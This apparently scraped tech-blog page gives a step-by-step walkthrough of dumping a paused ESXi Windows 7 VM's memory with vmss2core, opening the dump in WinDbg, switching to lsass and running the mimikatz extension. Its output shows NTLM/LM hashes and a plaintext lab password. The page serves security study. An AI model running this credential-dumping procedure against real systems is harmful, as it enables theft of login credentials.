[VM]Get Password from Virtual Machine Memory
来源:互联网 发布:角色数据读取失败 编辑:程序博客网 时间:2024/05/18 16:54
Env.
Virtual Machine
Target VM : win7x86 ( Build 7600) Based on ESXi 5.0
Process VM : Windows 7 SP1 x86 Build 7601
Tools
Step
Get dmp file
- Pause the Running Target VM.
- Copy vmss2core-Linux64 to ESXi (/vmfs/volumes/…/win7x86/) with WinSCP.
- Use vmss2core to convert win7x86-xxx.vmss into a dmp file(memory.dmp).
- Copy memory.dmp to Process VM (c:/vmss/) with WinSCP.
/vmfs/volumes/589af095-50718614-d536-005056881c2e/win7x86 # ./vmss2core-Linux64 -W7600 "win7x86-bfdbf0ed.vmss"vmss2core version 8437677 Copyright (C) 1998-2017 VMware, Inc. All rights reserved.Win32: found DDB at PA 0x2779be8Win32: MmPfnDatabase=0x827b9700Win32: PsLoadedModuleList=0x82799810Win32: PsActiveProcessHead=0x82791e98Win32: KiBugcheckData=0x827b1a00Win32: KernBase=0x82651000Win32: NtBuildLab=0x826a1068CoreDumpScanWin32: MinorVersion set to 7600... 10 MBs written.... 20 MBs written.... 30 MBs written....... 1010 MBs written.... 1020 MBs written.Finished writing core.
Locate lsass process
- Load the dump file into WinDbg (File -> Open Crash Dump).
- Load symbols by following command.
- Locate and Switch lsass process by following command.
kd> .sympath SRV*c:\vmss\localsymbols*http://msdl.microsoft.com/download/symbolsSymbol search path is: SRV*c:\vmss\localsymbols*http://msdl.microsoft.com/download/symbolsExpanded Symbol search path is: srv*c:\vmss\localsymbols*http://msdl.microsoft.com/download/symbolskd> .reloadLoading Kernel Symbols...................................................Loading User Symbols...................................................Loading unloaded module list......*** ERROR: Symbol file could not be found. Defaulted to export symbols for vmtools.dll -
kd> !process 0 0 lsass.exePROCESS 85d37a68 SessionId: 0 Cid: 0204 Peb: 7ffd8000 ParentCid: 0194 DirBase: 3eab20e0 ObjectTable: 96371e60 HandleCount: 564. Image: lsass.exekd> .process /r /p 85d37a68Implicit process is now 85d37a68Loading User Symbols..............................................................
Get password
- Load the mimilib.dll file.
- Run mimikatz.
kd> .load C:\vmss\mimilib.dll .#####. mimikatz 2.0 alpha (x86) built on Feb 29 2016 03:03:51 .## ^ ##. "A La Vie, A L'Amour" - Windows build 7600 ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' WinDBG extension ! * * */===================================# * Kernel mode * #===================================# Search for LSASS process0: kd> !process 0 0 lsass.exe# Then switch to its context0: kd> .process /r /p <EPROCESS address># And finally :0: kd> !mimikatz===================================# * User mode * #===================================0:000> !mimikatz===================================
kd> !mimikatzDPAPI Backup keys=================Current prefered key: Compatibility prefered key: SekurLSA========Authentication Id : 0 ; 618511 (00000000:0009700f)Session : Interactive from 1User Name : WIN7X86ENDomain : WIN7X86EN-PCLogon Server : WIN7X86EN-PCLogon Time : 2/24/2017 1:19:20 AMSID : S-1-5-21-2794451615-1102251730-2481481344-1000 msv : [00000003] Primary * Username : WIN7X86EN * Domain : WIN7X86EN-PC * LM : 16a5d217f7c9c7befdcfc2afb2d1be34 * NTLM : a91a49a72e7cf292cdad1bffdead9fd3 * SHA1 : e4496b25c5afb22a92d28dadecb7d5873e920b6e tspkg : * Username : WIN7X86EN * Domain : WIN7X86EN-PC * Password : mypassword wdigest : * Username : WIN7X86EN * Domain : WIN7X86EN-PC * Password : mypassword kerberos : * Username : WIN7X86EN * Domain : WIN7X86EN-PC * Password : mypassword * Key List aes256_hmac <no size, buffer is incorrect> aes128_hmac <no size, buffer is incorrect> rc4_hmac_nt a91a49a72e7cf292cdad1bffdead9fd3 rc4_hmac_old a91a49a72e7cf292cdad1bffdead9fd3 rc4_md4 a91a49a72e7cf292cdad1bffdead9fd3 rc4_hmac_nt_exp a91a49a72e7cf292cdad1bffdead9fd3 rc4_hmac_old_exp a91a49a72e7cf292cdad1bffdead9fd3 ssp : masterkey : credman :
Refer
Mimikatz Against Virtual Machine Memory Part 1
Mimikatz Against Virtual Machine Memory Part 2
1 0
- [VM]Get Password from Virtual Machine Memory
- VM:Could not open virtual machine解决方案
- hadoop 下载安装Cloudera Virtual Machine (VM)
- Get password hash from registry
- Virtual machine steal BlueTooth from Host(Mac)
- 详解:Virtual Machine vm虚拟机ip VM虚拟机网络设置 vm ip设置
- get the password from ipclient program
- 虚拟内存(virtual memory,VM)文件系统和绑定安装
- 使用虚拟内存(virtual memory,VM)文件系统和绑定安装
- memory management in the java HotSpot Virtual Machine(中文翻译)
- Session 4: Deploying a Virtual Machine from Horizon
- virtual machine
- Virtual machine
- virtual memory
- Virtual Memory
- Virtual Memory
- Virtual Memory Usage from Java under Linux, too much memory used
- Virtual Memory Usage from Java under Linux, too much memory used
- random-quote requirejs+scss实战
- 练习系统 实验二 R进制到十进制
- 一个五年Android开发者百度、阿里、聚美、映客的面试心经
- 深入理解C++构造、析构、赋值操作
- C++ string assign()赋值常用方法
- [VM]Get Password from Virtual Machine Memory
- REACT NATIVE(JS/ES)与IOS(OBJECT-C)交互通信
- UINavigationController笔记
- activiti工作流的web流程设计器整合视频教程 SSM和独立部署
- poi解析word文档(解析表格,emf,wmf,svg转jpg图片)
- 文章标题
- 返回最长上升子序列
- Vector 和 HashTable
- Android textAppearance的属性设置及TextView属性详解